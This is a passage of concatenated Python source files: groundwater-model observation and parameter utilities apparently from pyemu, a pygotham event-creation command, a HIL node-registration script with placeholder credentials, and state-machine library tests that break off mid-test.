warnings.warn(
"segs,reach pair listed with onames {0} was not found: {1}".format(
ob.Index, "({},{})".format(ob.segment, ob.reach)
),
PyemuWarning,
)
seg_reach = seg_reach.drop(diff.index)
seg_reach["obs_base"] = seg_reach.index
df_key = pd.DataFrame({"obs_base": keys, "segment": 0, "reach": values})
df_key = pd.concat([df_key, seg_reach], sort=True).reset_index(drop=True)
if include_path:
pth = os.path.join(*[p for p in os.path.split(sfr_out_file)[:-1]])
config_file = os.path.join(pth, "sfr_reach_obs.config")
else:
config_file = "sfr_reach_obs.config"
print("writing 'sfr_reach_obs.config' to {0}".format(config_file))
df_key.to_csv(config_file)
bd = "."
if include_path:
bd = os.getcwd()
os.chdir(pth)
try:
df = apply_sfr_reach_obs()
except Exception as e:
os.chdir(bd)
raise Exception("error in apply_sfr_reach_obs(): {0}".format(str(e)))
os.chdir(bd)
if model is not None:
dts = (
pd.to_datetime(model.start_datetime)
+ pd.to_timedelta(np.cumsum(model.dis.perlen.array), unit="d")
).date
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "time_str"] = df.datetime.apply(lambda x: x.strftime("%Y%m%d"))
else:
df.loc[:, "time_str"] = df.kper.apply(lambda x: "{0:04d}".format(x))
df.loc[:, "flaqx_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fa", x.obs_base, x.time_str), axis=1
)
df.loc[:, "flout_obsnme"] = df.apply(
lambda x: "{0}_{1}_{2}".format("fo", x.obs_base, x.time_str), axis=1
)
if ins_file is None:
ins_file = sfr_out_file + ".reach_processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
for fla, flo in zip(df.flaqx_obsnme, df.flout_obsnme):
f.write("l1 w w !{0}! !{1}!\n".format(fla, flo))
df = None
pth = os.path.split(ins_file)[:-1]
pth = os.path.join(*pth)
if pth == "":
pth = "."
bd = os.getcwd()
os.chdir(pth)
try:
df = try_process_output_file(
os.path.split(ins_file)[-1], os.path.split(sfr_out_file + ".processed")[-1]
)
except Exception as e:
pass
os.chdir(bd)
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(
lambda x: "flaqx" if x.startswith("fa") else "flout"
)
return df
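# --- usage sketch (illustrative only) ----------------------------------------
# Point observations at specific segment/reach locations.  The location pairs
# and the output file name are hypothetical.
def _example_setup_sfr_reach_obs():
    """sketch: set up obs at two named reach locations."""
    seg_reach = {"gauge_a": [2, 3], "gauge_b": [5, 1]}  # {obs base: [seg, reach]}
    df = setup_sfr_reach_obs(
        "freyberg.sfr.out",   # hypothetical SFR ASCII output file
        seg_reach=seg_reach,
        include_path=False,
    )
    return df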
def apply_sfr_reach_obs():
"""apply the sfr reach observation process.
Returns:
        `pd.DataFrame`: a dataframe of sfr aquifer and outflow at segment,reach locations
Note:
This is the companion function of `gw_utils.setup_sfr_reach_obs()`.
Requires sfr_reach_obs.config.
Writes <sfr_out_file>.processed, where <sfr_out_file> is defined in
"sfr_reach_obs.config"
"""
assert os.path.exists("sfr_reach_obs.config")
df_key = pd.read_csv("sfr_reach_obs.config", index_col=0)
assert df_key.iloc[0, 0] == "sfr_out_file", df_key.iloc[0, :]
sfr_out_file = df_key.iloc[0].reach
df_key = df_key.iloc[1:, :].copy()
df_key.loc[:, "segment"] = df_key.segment.apply(np.int)
df_key.loc[:, "reach"] = df_key.reach.apply(np.int)
df_key = df_key.set_index("obs_base")
sfr_kper = load_sfr_out(sfr_out_file, df_key)
kpers = list(sfr_kper.keys())
kpers.sort()
results = []
for kper in kpers:
df = sfr_kper[kper]
for sr in df_key.itertuples():
ob = df.loc["{0:03d}_{1:03d}".format(sr.segment, sr.reach), :]
results.append([kper, sr.Index, ob["flaqx"], ob["flout"]])
df = pd.DataFrame(data=results, columns=["kper", "obs_base", "flaqx", "flout"])
df.sort_values(by=["kper", "obs_base"], inplace=True)
df.to_csv(sfr_out_file + ".reach_processed", sep=" ", index=False)
return df
def modflow_sfr_gag_to_instruction_file(
gage_output_file, ins_file=None, parse_filename=False
):
"""writes an instruction file for an SFR gage output file to read Flow only at all times
Args:
gage_output_file (`str`): the gage output filename (ASCII).
ins_file (`str`, optional): the name of the instruction file to
create. If None, the name is `gage_output_file` +".ins".
Default is None
parse_filename (`bool`): if True, get the gage_num parameter by
parsing the gage output file filename if False, get the gage
number from the file itself
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with obsnme and obsval for the sfr simulated flows.
- **str**: file name of instructions file relating to gage output.
- **str**: file name of processed gage output for all times
Note:
Sets up observations for gage outputs only for the Flow column.
        If `parse_filename` is True, only text up to the first '.' is used as the gage_num
"""
if ins_file is None:
ins_file = gage_output_file + ".ins"
# navigate the file to be sure the header makes sense
indat = [line.strip() for line in open(gage_output_file, "r").readlines()]
header = [i for i in indat if i.startswith('"')]
# yank out the gage number to identify the observation names
if parse_filename:
gage_num = os.path.basename(gage_output_file).split(".")[0]
else:
gage_num = re.sub(
"[^0-9]", "", indat[0].lower().split("gage no.")[-1].strip().split()[0]
)
# get the column names
cols = (
[i.lower() for i in header if "data" in i.lower()][0]
.lower()
.replace('"', "")
.replace("data:", "")
.split()
)
# make sure "Flow" is included in the columns
if "flow" not in cols:
raise Exception('Requested field "Flow" not in gage output columns')
# find which column is for "Flow"
flowidx = np.where(np.array(cols) == "flow")[0][0]
# write out the instruction file lines
inslines = [
"l1 " + (flowidx + 1) * "w " + "!g{0}_{1:d}!".format(gage_num, j)
for j in range(len(indat) - len(header))
]
inslines[0] = inslines[0].replace("l1", "l{0:d}".format(len(header) + 1))
# write the instruction file
with open(ins_file, "w") as ofp:
ofp.write("pif ~\n")
[ofp.write("{0}\n".format(line)) for line in inslines]
df = try_process_output_file(ins_file, gage_output_file)
return df, ins_file, gage_output_file
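# --- usage sketch (illustrative only) ----------------------------------------
# Building an instruction file for a single SFR gage output file.  The gage
# file name below is hypothetical.
def _example_gag_to_instruction_file():
    """sketch: instruction file for the Flow column of a gage output file."""
    df, ins_file, out_file = modflow_sfr_gag_to_instruction_file(
        "sfr_gage_1.go",        # hypothetical gage output file
        parse_filename=False,   # read the gage number from the file header
    )
    # df (if the ins file could be processed) holds obsnme/obsval pairs
    return df, ins_file, out_file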
def setup_gage_obs(gage_file, ins_file=None, start_datetime=None, times=None):
"""setup a forward run post processor routine for the modflow gage file
Args:
gage_file (`str`): the gage output file (ASCII)
ins_file (`str`, optional): the name of the instruction file to create. If None, the name
is `gage_file`+".processed.ins". Default is `None`
start_datetime (`str`): a `pandas.to_datetime()` compatible `str`. If not `None`,
then the resulting observation names have the datetime suffix. If `None`,
the suffix is the output totim. Default is `None`.
times ([`float`]): a container of times to make observations for. If None,
all times are used. Default is None.
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with observation name and simulated values for the
values in the gage file.
- **str**: file name of instructions file that was created relating to gage output.
- **str**: file name of processed gage output (processed according to times passed above.)
Note:
        Sets up observations for gage outputs (all columns).
This is the companion function of `gw_utils.apply_gage_obs()`
"""
with open(gage_file, "r") as f:
line1 = f.readline()
gage_num = int(
re.sub("[^0-9]", "", line1.split("GAGE No.")[-1].strip().split()[0])
)
gage_type = line1.split("GAGE No.")[-1].strip().split()[1].lower()
obj_num = int(line1.replace('"', "").strip().split()[-1])
line2 = f.readline()
df = pd.read_csv(
f, delim_whitespace=True, names=line2.replace('"', "").split()[1:]
)
df.columns = [
c.lower().replace("-", "_").replace(".", "_").strip("_") for c in df.columns
]
# get unique observation ids
obs_ids = {
col: "" for col in df.columns[1:]
} # empty dictionary for observation ids
for col in df.columns[1:]: # exclude column 1 (TIME)
colspl = col.split("_")
if len(colspl) > 1:
# obs name built out of "g"(for gage) "s" or "l"(for gage type) 2 chars from column name - date added later
obs_ids[col] = "g{0}{1}{2}".format(
gage_type[0], colspl[0][0], colspl[-1][0]
)
else:
obs_ids[col] = "g{0}{1}".format(gage_type[0], col[0:2])
with open(
"_gage_obs_ids.csv", "w"
    ) as f:  # write file relating obs names to meaningful keys!
[f.write("{0},{1}\n".format(key, obs)) for key, obs in obs_ids.items()]
# find passed times in df
if times is None:
times = df.time.unique()
missing = []
utimes = df.time.unique()
for t in times:
if not np.isclose(t, utimes).any():
missing.append(str(t))
if len(missing) > 0:
print(df.time)
raise Exception("the following times are missing:{0}".format(",".join(missing)))
# write output times to config file
with open("gage_obs.config", "w") as f:
f.write(gage_file + "\n")
[f.write("{0:15.10E}\n".format(t)) for t in times]
# extract data for times: returns dataframe and saves a processed df - read by pest
df, obs_file = apply_gage_obs(return_obs_file=True)
utimes = df.time.unique()
for t in times:
assert np.isclose(
t, utimes
).any(), "time {0} missing in processed dataframe".format(t)
idx = df.time.apply(
lambda x: np.isclose(x, times).any()
) # boolean selector of desired times in df
if start_datetime is not None:
# convert times to usable observation times
start_datetime = pd.to_datetime(start_datetime)
df.loc[:, "time_str"] = pd.to_timedelta(df.time, unit="d") + start_datetime
df.loc[:, "time_str"] = df.time_str.apply(
lambda x: datetime.strftime(x, "%Y%m%d")
)
else:
df.loc[:, "time_str"] = df.time.apply(lambda x: "{0:08.2f}".format(x))
# set up instructions (line feed for lines without obs (not in time)
df.loc[:, "ins_str"] = "l1\n"
df_times = df.loc[idx, :] # Slice by desired times
# TODO include GAGE No. in obs name (if permissible)
df.loc[df_times.index, "ins_str"] = df_times.apply(
lambda x: "l1 w {}\n".format(
" w ".join(
["!{0}{1}!".format(obs, x.time_str) for key, obs in obs_ids.items()]
)
),
axis=1,
)
df.index = np.arange(df.shape[0])
if ins_file is None:
ins_file = gage_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
[f.write(i) for i in df.ins_str]
df = try_process_output_file(ins_file, gage_file + ".processed")
return df, ins_file, obs_file
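# --- usage sketch (illustrative only) ----------------------------------------
# Setting up gage-file observations for a subset of output times.  The file
# name, start date, and times are hypothetical and must match totim values
# actually present in the gage file.
def _example_setup_gage_obs():
    """sketch: gage obs at two output times with datetime-suffixed names."""
    df, ins_file, obs_file = setup_gage_obs(
        "lake_gage.out",            # hypothetical gage output file
        start_datetime="1-1-2020",  # obs names get YYYYMMDD suffixes
        times=[30.0, 60.0],         # totim values expected in the file
    )
    return df, ins_file, obs_file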
def apply_gage_obs(return_obs_file=False):
"""apply the modflow gage obs post-processor
Args:
return_obs_file (`bool`): flag to return the processed
observation file. Default is `False`.
Note:
This is the companion function of `gw_utils.setup_gage_obs()`
"""
times = []
with open("gage_obs.config") as f:
gage_file = f.readline().strip()
for line in f:
times.append(float(line.strip()))
obs_file = gage_file + ".processed"
with open(gage_file, "r") as f:
line1 = f.readline()
gage_num = int(
re.sub("[^0-9]", "", line1.split("GAGE No.")[-1].strip().split()[0])
)
gage_type = line1.split("GAGE No.")[-1].strip().split()[1].lower()
obj_num = int(line1.replace('"', "").strip().split()[-1])
line2 = f.readline()
df = pd.read_csv(
f, delim_whitespace=True, names=line2.replace('"', "").split()[1:]
)
df.columns = [c.lower().replace("-", "_").replace(".", "_") for c in df.columns]
df = df.loc[df.time.apply(lambda x: np.isclose(x, times).any()), :]
df.to_csv(obs_file, sep=" ", index=False)
if return_obs_file:
return df, obs_file
else:
return df
def apply_hfb_pars(par_file="hfb6_pars.csv"):
"""a function to apply HFB multiplier parameters.
Args:
par_file (`str`): the HFB parameter info file.
            Default is `hfb6_pars.csv`
Note:
This is the companion function to
`gw_utils.write_hfb_zone_multipliers_template()`
This is to account for the horrible HFB6 format that differs from other
BCs making this a special case
Requires "hfb_pars.csv"
Should be added to the forward_run.py script
"""
hfb_pars = pd.read_csv(par_file)
hfb_mults_contents = open(hfb_pars.mlt_file.values[0], "r").readlines()
skiprows = (
sum([1 if i.strip().startswith("#") else 0 for i in hfb_mults_contents]) + 1
)
header = hfb_mults_contents[:skiprows]
# read in the multipliers
names = ["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]
hfb_mults = pd.read_csv(
hfb_pars.mlt_file.values[0],
skiprows=skiprows,
delim_whitespace=True,
names=names,
).dropna()
# read in the original file
hfb_org = pd.read_csv(
hfb_pars.org_file.values[0],
skiprows=skiprows,
delim_whitespace=True,
names=names,
).dropna()
# multiply it out
hfb_org.hydchr *= hfb_mults.hydchr
for cn in names[:-1]:
        hfb_mults[cn] = hfb_mults[cn].astype(int)
        hfb_org[cn] = hfb_org[cn].astype(int)
# write the results
with open(hfb_pars.model_file.values[0], "w", newline="") as ofp:
[ofp.write("{0}\n".format(line.strip())) for line in header]
ofp.flush()
hfb_org[["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]].to_csv(
ofp, sep=" ", header=None, index=None
)
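# --- usage sketch (illustrative only) ----------------------------------------
# The companion setup routine writes "hfb6_pars.csv" with a single row of
# org_file,mlt_file,model_file paths, e.g. (hypothetical contents):
#
#   org_file,mlt_file,model_file
#   hfb6_org/model.hfb,hfb6_mlt/hfb6.mlt,model.hfb
#
# During the forward run the multiplier step is then a single call.
def _example_apply_hfb_pars():
    """sketch: apply HFB multipliers inside forward_run.py."""
    apply_hfb_pars(par_file="hfb6_pars.csv")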
def write_hfb_zone_multipliers_template(m):
"""write a template file for an hfb using multipliers per zone (double yuck!)
Args:
m (`flopy.modflow.Modflow`): a model instance with an HFB package
Returns:
tuple containing
- **dict**: a dictionary with original unique HFB conductivity values and their
corresponding parameter names
- **str**: the template filename that was created
"""
if m.hfb6 is None:
raise Exception("no HFB package found")
# find the model file
hfb_file = os.path.join(m.model_ws, m.hfb6.file_name[0])
# this will use multipliers, so need to copy down the original
if not os.path.exists(os.path.join(m.model_ws, "hfb6_org")):
os.mkdir(os.path.join(m.model_ws, "hfb6_org"))
# copy down the original file
shutil.copy2(
os.path.join(m.model_ws, m.hfb6.file_name[0]),
os.path.join(m.model_ws, "hfb6_org", m.hfb6.file_name[0]),
)
if not os.path.exists(os.path.join(m.model_ws, "hfb6_mlt")):
os.mkdir(os.path.join(m.model_ws, "hfb6_mlt"))
# read in the model file
hfb_file_contents = open(hfb_file, "r").readlines()
# navigate the header
skiprows = (
sum([1 if i.strip().startswith("#") else 0 for i in hfb_file_contents]) + 1
)
header = hfb_file_contents[:skiprows]
# read in the data
names = ["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]
hfb_in = pd.read_csv(
hfb_file, skiprows=skiprows, delim_whitespace=True, names=names
).dropna()
for cn in names[:-1]:
        hfb_in[cn] = hfb_in[cn].astype(int)
# set up a multiplier for each unique conductivity value
unique_cond = hfb_in.hydchr.unique()
hfb_mults = dict(
zip(unique_cond, ["hbz_{0:04d}".format(i) for i in range(len(unique_cond))])
)
# set up the TPL line for each parameter and assign
hfb_in["tpl"] = "blank"
for cn, cg in hfb_in.groupby("hydchr"):
hfb_in.loc[hfb_in.hydchr == cn, "tpl"] = "~{0:^10s}~".format(hfb_mults[cn])
assert "blank" not in hfb_in.tpl
# write out the TPL file
tpl_file = os.path.join(m.model_ws, "hfb6.mlt.tpl")
with open(tpl_file, "w", newline="") as ofp:
ofp.write("ptf ~\n")
[ofp.write("{0}\n".format(line.strip())) for line in header]
ofp.flush()
hfb_in[["lay", "irow1", "icol1", "irow2", "icol2", "tpl"]].to_csv(
ofp, sep=" ", quotechar=" ", header=None, index=None, mode="a"
)
# make a lookup for lining up the necessary files to
# perform multiplication with the helpers.apply_hfb_pars() function
# which must be added to the forward run script
with open(os.path.join(m.model_ws, "hfb6_pars.csv"), "w") as ofp:
ofp.write("org_file,mlt_file,model_file\n")
ofp.write(
"{0},{1},{2}\n".format(
os.path.join(m.model_ws, "hfb6_org", m.hfb6.file_name[0]),
os.path.join(
m.model_ws,
"hfb6_mlt",
os.path.basename(tpl_file).replace(".tpl", ""),
),
hfb_file,
)
)
return hfb_mults, tpl_file
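# --- usage sketch (illustrative only) ----------------------------------------
# Writing the zone-multiplier template for an existing model.  The model name
# and workspace are hypothetical assumptions; the returned dict maps each
# unique HFB conductivity value to its multiplier parameter name.
def _example_write_hfb_zone_multipliers_template():
    """sketch: build the HFB multiplier template from a loaded model."""
    import flopy
    m = flopy.modflow.Modflow.load(
        "model.nam", model_ws="template_ws", check=False  # hypothetical paths
    )
    hfb_mults, tpl_file = write_hfb_zone_multipliers_template(m)
    # remember to add gw_utils.apply_hfb_pars() to forward_run.py so the
    # multipliers are applied before MODFLOW runs
    return hfb_mults, tpl_file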
def write_hfb_template(m):
"""write a template file for an hfb (yuck!)
Args:
m (`flopy.modflow.Modflow`): a model instance with an HFB package
Returns:
tuple containing
- **str**: name of the template file that was created
        - **pandas.DataFrame**: a dataframe with useful control file info for the
HFB parameters
"""
assert m.hfb6 is not None
hfb_file = os.path.join(m.model_ws, m.hfb6.file_name[0])
assert os.path.exists(hfb_file), "couldn't find hfb_file {0}".format(hfb_file)
f_in = open(hfb_file, "r")
tpl_file = hfb_file + ".tpl"
f_tpl = open(tpl_file, "w")
f_tpl.write("ptf ~\n")
parnme, parval1, xs, ys = [], [], [], []
iis, jjs, kks = [], [], []
xc = m.sr.xcentergrid
yc = m.sr.ycentergrid
while True:
line = f_in.readline()
if line == "":
break
f_tpl.write(line)
if not line.startswith("#"):
raw = line.strip().split()
nphfb = int(raw[0])
mxfb = int(raw[1])
nhfbnp = int(raw[2])
if nphfb > 0 or mxfb > 0:
raise Exception("not supporting terrible HFB pars")
for i in range(nhfbnp):
line = f_in.readline()
if line == "":
raise Exception("EOF")
raw = line.strip().split()
k = int(raw[0]) - 1
i = int(raw[1]) - 1
j = int(raw[2]) - 1
pn = "hb{0:02}{1:04d}{2:04}".format(k, i, j)
pv = float(raw[5])
raw[5] = "~ {0} ~".format(pn)
line = " ".join(raw) + "\n"
f_tpl.write(line)
parnme.append(pn)
parval1.append(pv)
xs.append(xc[i, j])
ys.append(yc[i, j])
iis.append(i)
jjs.append(j)
kks.append(k)
break
f_tpl.close()
f_in.close()
df = pd.DataFrame(
{
"parnme": parnme,
"parval1": parval1,
"x": xs,
"y": ys,
"i": iis,
"j": jjs,
"k": kks,
},
index=parnme,
)
df.loc[:, "pargp"] = "hfb_hydfac"
df.loc[:, "parubnd"] = df.parval1.max() * 10.0
df.loc[:, "parlbnd"] = df.parval1.min() * 0.1
return tpl_file, df
class GsfReader:
"""
a helper class to read a standard modflow-usg gsf file
Args:
gsffilename (`str`): filename
"""
def __init__(self, gsffilename):
with open(gsffilename, "r") as f:
self.read_data = f.readlines()
self.nnode, self.nlay, self.iz, self.ic = [
int(n) for n in self.read_data[1].split()
]
self.nvertex = int(self.read_data[2])
def get_vertex_coordinates(self):
"""
Returns:
Dictionary containing list of x, y and z coordinates for each vertex
"""
# vdata = self.read_data[3:self.nvertex+3]
vertex_coords = {}
for vert in range(self.nvertex):
x, y, z = self.read_data[3 + vert].split()
vertex_coords[vert + 1] = [float(x), float(y), float(z)]
return vertex_coords
def get_node_data(self):
"""
Returns:
nodedf: a pd.DataFrame containing Node information; Node, X, Y, Z, layer, numverts, vertidx
"""
node_data = []
for node in range(self.nnode):
nid, x, y, z, lay, numverts = self.read_data[
self.nvertex + 3 + node
].split()[:6]
# vertidx = {'ivertex': [int(n) for n in self.read_data[self.nvertex+3 + node].split()[6:]]}
vertidx = [
int(n) for n in self.read_data[self.nvertex + 3 + node].split()[6:]
]
node_data.append(
[
int(nid),
float(x),
float(y),
float(z),
int(lay),
int(numverts),
vertidx,
]
)
nodedf = pd.DataFrame(
node_data, columns=["node", "x", "y", "z", "layer", "numverts", "vertidx"]
)
return nodedf
def get_node_coordinates(self, zcoord=False, zero_based=False):
"""
Args:
zcoord (`bool`): flag to add z coord to coordinates. Default is False
zero_based (`bool`): flag to subtract one from the node numbers in the returned
node_coords dict. This is needed to support PstFrom. Default is False
Returns:
node_coords: Dictionary containing x and y coordinates for each node
"""
node_coords = {}
for node in range(self.nnode):
nid, x, y, z, lay, numverts = self.read_data[
self.nvertex + 3 + node
].split()[:6]
nid = int(nid)
if zero_based:
nid -= 1
node_coords[nid] = [float(x), float(y)]
if zcoord:
node_coords[nid] += [float(z)]
return node_coords
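# --- usage sketch (illustrative only) ----------------------------------------
# Reading node information from a MODFLOW-USG gsf file.  The file name is
# hypothetical.
def _example_gsf_reader():
    """sketch: pull node coordinates and per-node metadata from a gsf file."""
    gsf = GsfReader("usg_model.gsf")  # hypothetical gsf file
    node_coords = gsf.get_node_coordinates(zcoord=True, zero_based=True)
    nodedf = gsf.get_node_data()      # node, x, y, z, layer, numverts, vertidx
    return node_coords, nodedf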
| bsd-3-clause | 1,953,825,560,543,366,700 | 36.248477 | 134 | 0.557838 | false |
PyGotham/pygotham | pygotham/manage/events.py | 1 | 1920 | """Event-related management commands."""
import sys
import arrow
from flask import current_app
from flask_script import Command, prompt, prompt_bool
from werkzeug.datastructures import MultiDict
from pygotham.core import db
from pygotham.forms import EventForm
from pygotham.models import Event
class CreateEvent(Command):
"""Management command to create an :class:`~pygotham.models.Event`.
In addition to asking for certain values, the event can also be
activated.
"""
def run(self):
"""Run the command."""
# Get the information.
name = prompt('Name')
slug = prompt('Slug (optional)')
begins = prompt('Event start date (YYYY-MM-DD)')
ends = prompt('Event end date (YYYY-MM-DD)')
proposals_begin = prompt('CFP start date (YYYY-MM-DD HH:MM:SS)')
active = prompt_bool('Activate the event')
data = MultiDict({
'name': name,
'slug': slug,
'begins': begins,
'ends': ends,
'proposals_begin': proposals_begin,
'active': active,
})
# Validate the form.
form = EventForm(data, csrf_enabled=False)
if form.validate():
# Save the new event.
event = Event()
form.populate_obj(event)
if event.active:
now = arrow.utcnow().to(current_app.config['TIME_ZONE']).naive
event.activity_begins = now
db.session.add(event)
db.session.commit()
print('\nEvent created successfully.')
print('Event(id={} slug={} name={})'.format(
event.id, event.slug, event.name))
return event
# If something went wrong, report it and exit out.
print('\nError creating event:')
for errors in form.errors.values():
print('\n'.join(errors))
sys.exit(1)
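# --- usage sketch (illustrative only) ----------------------------------------
# A hedged example of how this command is typically exposed through a
# Flask-Script manager; ``app`` is assumed to be the project's Flask
# application and is not defined in this module.
def _example_register_command(app):
    """sketch: attach CreateEvent to a Flask-Script Manager for ``app``."""
    from flask_script import Manager

    manager = Manager(app)
    manager.add_command('create_event', CreateEvent())
    return manager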
| bsd-3-clause | -2,552,559,807,039,151,000 | 28.538462 | 78 | 0.578125 | false |
SahilTikale/haas | examples/dbinit.py | 2 | 1653 | #!/usr/bin/python
"""
Register nodes with HIL.
This is intended to be used as a template for either creating a mock HIL setup
for development or to be modified to register real-life nodes that follow a
particular pattern.
In the example environment for which this module is written, there are
``N_NODES`` nodes whose IPMI interfaces are sequentially numbered starting at
10.0.0.1, with a username of "ADMIN_USER" and a password of "ADMIN_PASSWORD".
The ports are also numbered sequentially and are named following a Dell
switch scheme, with port names that look like "gi1/0/5".
This script could be used in an environment similar to the one to which
``hil.cfg`` corresponds, though it could also be used for development with
``hil.cfg.dev*``.
"""
from subprocess import check_call
N_NODES = 6
ipmi_user = "ADMIN_USER"
ipmi_pass = "ADMIN_PASSWORD"
switch = "mock01"
obmd_base_uri = 'http://obmd.example.com/nodes/'
obmd_admin_token = 'secret'
def hil(*args):
"""Convenience function that calls the hil command line tool with
the given arguments.
"""
args = map(str, args)
print args
check_call(['hil'] + args)
hil('switch', 'register', switch, 'mock', 'ip', 'user', 'pass')
for node in range(N_NODES):
ipmi_ip = "10.0.0." + str(node + 1)
nic_port = "gi1/0/%d" % (node)
nic_name = 'nic1'
hil('node', 'register',
node,
obmd_base_uri + str(node),
obmd_admin_token,
"mock", ipmi_ip, ipmi_user, ipmi_pass)
hil('node', 'nic', 'register', node, nic_name, 'FillThisInLater')
hil('port', 'register', switch, nic_port)
hil('port', 'nic', 'add', switch, nic_port, node, nic_name)
| apache-2.0 | 1,030,338,861,592,609,900 | 29.611111 | 78 | 0.678766 | false |
jtushman/state_machine | tests.py | 1 | 11684 | import os
import nose
import functools
from pymongo import MongoClient
from nose.plugins.skip import SkipTest
from nose.tools import *
from nose.tools import assert_raises
try:
import mongoengine
except ImportError:
mongoengine = None
def establish_mongo_connection():
mongo_name = os.environ.get('AASM_MONGO_DB_NAME', 'test_acts_as_state_machine')
mongo_port = int(os.environ.get('AASM_MONGO_DB_PORT', 27017))
mongoengine.connect(mongo_name, port=mongo_port)
try:
import sqlalchemy
engine = sqlalchemy.create_engine('sqlite:///:memory:', echo=True)
except ImportError:
sqlalchemy = None
from state_machine import acts_as_state_machine, before, State, Event, after, InvalidStateTransition
def requires_mongoengine(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if mongoengine is None:
raise SkipTest("mongoengine is not installed")
return func(*args, **kw)
return wrapper
def clear_mongo_databases():
mongo_name = os.environ.get('AASM_MONGO_DB_NAME', 'test_acts_as_state_machine')
mongo_port = int(os.environ.get('AASM_MONGO_DB_PORT', 27017))
client = MongoClient(port=mongo_port)
client.drop_database(mongo_name)
def requires_sqlalchemy(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if sqlalchemy is None:
raise SkipTest("sqlalchemy is not installed")
return func(*args, **kw)
return wrapper
###################################################################################
## Plain Old In Memory Tests
###################################################################################
def test_state_machine():
@acts_as_state_machine
class Robot():
name = 'R2-D2'
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
robot = Robot()
eq_(robot.current_state, 'sleeping')
assert robot.is_sleeping
assert not robot.is_running
robot.run()
assert robot.is_running
robot.sleep()
assert robot.is_sleeping
def test_state_machine_no_callbacks():
@acts_as_state_machine
class Robot():
name = 'R2-D2'
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
robot = Robot()
eq_(robot.current_state, 'sleeping')
assert robot.is_sleeping
assert not robot.is_running
robot.run()
assert robot.is_running
robot.sleep()
assert robot.is_sleeping
def test_multiple_machines():
@acts_as_state_machine
class Person(object):
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('run')
def on_run(self):
things_done.append("Person.ran")
@acts_as_state_machine
class Dog(object):
sleeping = State(initial=True)
running = State()
run = Event(from_states=sleeping, to_state=running)
sleep = Event(from_states=(running,), to_state=sleeping)
@before('run')
def on_run(self):
things_done.append("Dog.ran")
things_done = []
person = Person()
dog = Dog()
eq_(person.current_state, 'sleeping')
eq_(dog.current_state, 'sleeping')
assert person.is_sleeping
assert dog.is_sleeping
person.run()
eq_(things_done, ["Person.ran"])
###################################################################################
## SqlAlchemy Tests
###################################################################################
@requires_sqlalchemy
def test_sqlalchemy_state_machine():
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Puppy(Base):
__tablename__ = 'puppies'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
puppy = Puppy(name='Ralph')
eq_(puppy.current_state, Puppy.sleeping)
assert puppy.is_sleeping
assert not puppy.is_running
puppy.run()
assert puppy.is_running
session.add(puppy)
session.commit()
puppy2 = session.query(Puppy).filter_by(id=puppy.id)[0]
assert puppy2.is_running
@requires_sqlalchemy
def test_sqlalchemy_state_machine_no_callbacks():
''' This is to make sure that the state change will still work even if no callbacks are registered.
'''
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Kitten(Base):
__tablename__ = 'kittens'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
kitten = Kitten(name='Kit-Kat')
eq_(kitten.current_state, Kitten.sleeping)
assert kitten.is_sleeping
assert not kitten.is_running
kitten.run()
assert kitten.is_running
session.add(kitten)
session.commit()
kitten2 = session.query(Kitten).filter_by(id=kitten.id)[0]
assert kitten2.is_running
@requires_sqlalchemy
def test_sqlalchemy_state_machine_using_initial_state():
''' This is to make sure that the database will save the object with the initial state.
'''
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Penguin(Base):
__tablename__ = 'penguins'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
